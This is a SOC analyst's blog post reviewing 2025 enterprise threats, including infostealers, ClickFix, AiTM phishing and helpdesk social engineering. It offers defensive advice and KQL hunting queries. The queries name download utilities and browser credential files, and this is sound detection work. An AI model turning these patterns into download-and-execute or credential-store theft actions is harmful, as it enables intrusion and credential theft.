Summary of 2025 from a SOC Analyst
Overview
2025 showed clear, practical shifts in what actually hurts enterprises day-to-day: identity and user execution was the popular path for threat actors. The year wasn’t packed with advanced persistent threat (APT) tradecraft for most enterprise environments. It was about scale: AI-assisted social engineering, commodity malware delivered through trusted platforms, and “make the user do it” execution Click-fix style chains that bypass controls.
What stood out most in 2025 was how heavily attackers leaned into trusted surfaces — Microsoft 365, Teams, browser sessions, GitHub/CDN-style hosting, and advertising platforms — while running the same repeatable playbooks at scale: infostealers to harvest credentials and tokens, followed by initial access, then ransomware or business email compromise (BEC). This wasn’t about novel tradecraft; it was about efficiency. Microsoft’s reporting and ENISA’s 2025 threat landscape both reinforce this shift, highlighting the growing scale of social engineering, faster exploitation cycles, and the increasing abuse of legitimate services as core drivers of modern enterprise compromise.
For obvious reasons I cannot be to specific, however Below are the patterns I saw repeatedly across 2025, and why they matter.
1) Infostealers
What changed in 2025
Infostealers aren’t “just password grabbers” anymore they’re an access factory. MaaS ecosystems like Lumma kept showing up with flexible delivery, fast iteration, and reliable stealing of browser data/session material that fuels downstream compromise.
How it showed up in enterprise
- Initial access increasingly looked like “valid login + normal tools” because creds/tokens were already stolen.
- Infostealers arrived via malvertising/redirect chains and were often staged on “normal looking” platforms (including developer/hosting ecosystems). Microsoft documented large-scale malvertising leading victims through redirectors and ultimately to payload hosting on platforms like GitHub.
Practical takeaways
Treat session theft as a first-class risk. In practice, conditional access, token protection, and device compliance matter far more than traditional password policies that involve complexity. Defenders should prioritise detections that focus on unusual browser credential access patterns, new persistence mechanisms appearing after “user-initiated” installer activity, and outbound connections to fresh or low-reputation infrastructure immediately following a download or ZIP execution.
Tips for hunting in Kusto query langauge (KQL)
- Look for payloads being pulled from the internet
DeviceProcessEvents
| where FileName in~ ("powershell.exe", "mshta.exe", "msbuild.exe", "rundll32.exe")
| where ProcessCommandLine has_any ("http", "https", "Invoke-WebRequest", "curl", "wget")
| join kind=inner (
DeviceNetworkEvents
| where RemoteIPType == "Public"
| where ActionType == "ConnectionSuccess"
) on DeviceId
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, RemoteIP, RemoteUrl
- Look for non-browser processes touching credential stores
DeviceProcessEvents
| where ProcessCommandLine has_any ("Login Data", "Cookies", "Local State", "Web Data")
| where InitiatingProcessFileName !in~ ("chrome.exe", "msedge.exe", "firefox.exe")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
2) AI-driven phishing
What changed in 2025
The big change wasn’t that AI invented new attack vectors ( that is changing), however it lowered the effort to produce high-volume, high-quality lures and impersonation content. Microsoft’s Digital Defence reporting explicitly calls out AI-enabled phishing and fast-evolving multi-stage chains as a key theme. ([Microsoft][1]) ENISA’s 2025 threat landscape also flags AI as a defining element, particularly around social engineering at scale. ([ENISA][4])
Waves of new reports and research are being released on the expected evolving Ai situation and how it will continue to change and affect the industry.
How it showed up in enterprise
- Better-written pretexts, fewer “obvious scam” tells.
- Faster iteration: lure themes changed weekly, not quarterly.
- More multi-channel delivery (email + messaging + calls), which links directly to the next sections.
Practical takeaways
- Stop relying on “users will spot bad grammar” as a control.
- Harden identity workflows: phishing-resistant MFA where possible, stronger verification for payment/invoice changes, and out-of-band verification procedures that don’t depend on the same compromised channel.
- AI and business email compromise (BEC) is a lethal combination. Users should feel comfortable reporting anything that seems out of place.
Investigation tips:
- Check email context in the business environment
- Does it relate to receipient users role. (IMPORTANT: this does not mean it is benign, but forumaltes part of your investigation)
- Pull the email in alignment with your organisations arrangemenbt for viewing emails – Look for any signs of spoofing in email authentication – Analyse links and attachments (IMPORTANT: Links or attachments may not work in sandboxed environments this is threat actor design, don’t assume benign) – Look for suspicious redirections or cloned sites that do no line up in the URL field. – If suspicious move to the next phase and check if user interacted/ downloaded.
EmailEvents
| where TimeGenerated >= ago(90d)
| where SenderFromAddress contains "<insert email>"
// customise as you see fit, but establishing context is important, however again not a indication of benign.
TIP: Being a good analyst is about coming to accurate decisions in a reasonable amount of time, and justifying why you have come to a verdict based on the evidence.
3) Impersonation via WhatsApp and social media (trust hijack)
What changed in 2025
Attackers kept moving toward platforms where people respond quickly, and moves them out of site of security monitoring: WhatsApp, SMS, social Dms, and other encrypted collaboration applications. Even when the exact scam mechanics vary, the consistent pattern is impersonation, urgency or establishing trust via a high profile identity like a CEO for example..
How it showed up in enterprise
- Finance/HR impersonation attempts outside email.
- “Vendor” or “exec” outreach pushing invoice changes, gift cards, or urgent login steps.
- Staff assuming WhatsApp/DM = “more legitimate” because it feels personal.
- CEO or executive impersonation.
Practical takeaways
- Write (and enforce) a policy: no financial approvals or credential workflows over consumer messaging apps.
- Train staff to treat “new number, urgent request” as a default red flag and to verify via known channels.
4) Helpdesk phishing / identity resets
What changed in 2025
Threat groups kept proving that the helpdesk is a privileged access path. If an attacker can get a password reset or MFA change approved, they don’t need malware.
Australia’s ASD/ACSC guidance on Scattered Spider explicitly calls out social engineering of IT helpdesks to reset passwords/MFA as a core technique. ([cyber.gov.au][6]) CrowdStrike also described Scattered Spider activity expanding targets in 2025 with consistent tradecraft, reinforcing how operationally “standard” helpdesk abuse has become. ([CrowdStrike][7])
How it showed up in enterprise
- MFA resets and enrollment changes followed by rapid access to M365/SSO apps.
- Attackers living inside collaboration platforms after identity takeover (including Teams/communications abuse). Microsoft discussed threats targeting Teams and how attackers leverage password resets/MFA control to operate. ([Microsoft][8])
Practical takeaways
-
Lock down helpdesk workflows:
- Require strong identity verification for resets (not KBA).
- Add “cool-off” periods or manager approval for MFA changes on privileged accounts.
- Alert on MFA method changes + new device + new geo sequences.
5) Trojanised installers ads + fake sites leading to stealers/loaders/RATs
What changed in 2025
Fake installers stayed brutally effective because they exploit normal behaviour (“I need this tool now”). The distribution got better: sponsored ads, SEO poisoning, and “looks real enough” landing pages.
Kaspersky described a macOS infostealer campaign using paid search ads and even abuse of shared AI chat links to lure users into running commands that install an infostealer/backdoor. ([me-en.kaspersky.com][9]) This is the same underlying enterprise lesson: users will trust what’s at the top of search results if it looks official.
One example is that of the fake PuTTY installers. PuTTY is a commonly used tool by IT professionals, it is a lightweight Windows tool used to make remote command-line connections to other systems. Recent campaigns have exploited this tools widespread use in the enterprise environment. Artic Wolf
How it showed up in enterprise
- Users downloading “utilities” (PDF tools, archivers, remote tools) from sponsored results.
- Initial foothold becoming infostealer → then remote access tooling or loader deployment.
Practical takeaways
- Restrict execution of new/untrusted installers where possible (application control).
- Browser controls matter: block known bad ad/redirect infrastructure, enforce safe browsing, and monitor for first-time installs from user profile/temp locations.

6) ClickFix (make the user run the payload)
What changed in 2025
ClickFix is one of the most important “enterprise reality” shifts: attackers intentionally add a human step (copy/paste or run a command) to bypass controls that are better at blocking automated droppers.
Microsoft broke down ClickFix as a social engineering technique: lure the user to execute command followed by malware chain. ([Microsoft][10]) Huntress also documented ClickFix campaigns delivering infostealers (including Lumma and others), showing how it ties directly into the credential-theft economy. ([Huntress][11])
How it showed up in enterprise
- Fake error prompts, “verification” pages, fake security messages, fake update flows.
- Clipboard-driven PowerShell execution that looks like “user did it” (because they did).
Practical takeaways
- Train specifically on “never run commands from a webpage / email” (most training is too generic).
- Detection focus: suspicious parent/child chains and command lines around PowerShell/mshta/msbuild/rundll32 triggered shortly after browser activity.
7) AiTM phishing using site clones / brand impersonation (MFA bypass remains common)
What changed in 2025
AiTM phishing stayed dominant because it beats basic MFA by stealing session cookies/tokens via reverse proxies and realistic clones.
Sekoia’s 2025 analysis highlights the scale and prevalence of AiTM kits (Tycoon 2FA and others) and notes rapid evolution in delivery formats (e.g., shifting attachment/link delivery techniques). ([Sekoia.io Blog][12]) Barracuda also discussed the volume and evolution of phishing-as-a-service and AiTM-style kits in 2025 targeting Microsoft 365. ([Barrcuda Blog][13])
How it showed up in enterprise
- Microsoft 365 account takeovers where the login looked legitimate (because it was proxied).
- “New MFA prompt” fatigue exploited to complete the chain.
Practical takeaways
- Push toward phishing-resistant MFA for high-risk users (where feasible).
- Enforce conditional access: impossible travel, device compliance, risk-based sign-in policies.
- Alert on sign-in from new device + token issuance + mailbox rules changes (classic post-phish behaviour).
Wrap-up: the 2025 pattern in one line
2025 was the year attackers doubled down on identity + user execution while hiding behind trusted platforms and accelerating with AI-assisted scale. This has been my personal experience in my role, across all these various threats. While there is some variations this has been a consistent theme. I have not included extensions in this blog, however I am going to go into more detail on malicious extensions in the next blog.
Hopefully this blog for new or aspiring analyst has given you a firm idea of the threat environment particularly for the enterprise environment. By staying up to date on threat intelligence and strategic shifts you will be stronger as a defensive analyst and will move to proactive security.
References
- Microsoft: Lumma Stealer delivery techniques (May 21, 2025) (Microsoft)
- Microsoft: large-scale malvertising leading to info stealers hosted on platforms like GitHub (Mar 6, 2025) (Microsoft)
- Microsoft: ClickFix social engineering technique (Aug 21, 2025) (Microsoft)
- Huntress: ClickFix delivering infostealers via steganography/image stages (Nov 24, 2025) (Huntress)
- Sekoia: global analysis of AiTM phishing kits & evolving delivery (Jun 11, 2025) (Sekoia.io Blog)
- Barracuda: phishing-as-a-service / AiTM trends in early 2025 (Barrcuda Blog)
- cyber.gov.au: Scattered Spider helpdesk/MFA reset social engineering (cyber.gov.au)
- CrowdStrike: Scattered Spider escalation across industries (Jul 2, 2025) (CrowdStrike)
- Microsoft: threats targeting Microsoft Teams and identity takeover flow (Oct 7, 2025) (Microsoft)
- ENISA Threat Landscape 2025 (Oct 7, 2025) (ENISA)
- Kaspersky: paid search ads + AI-chat link abuse delivering AMOS infostealer (Dec 2025) (me-en.kaspersky.com)
Leave a Reply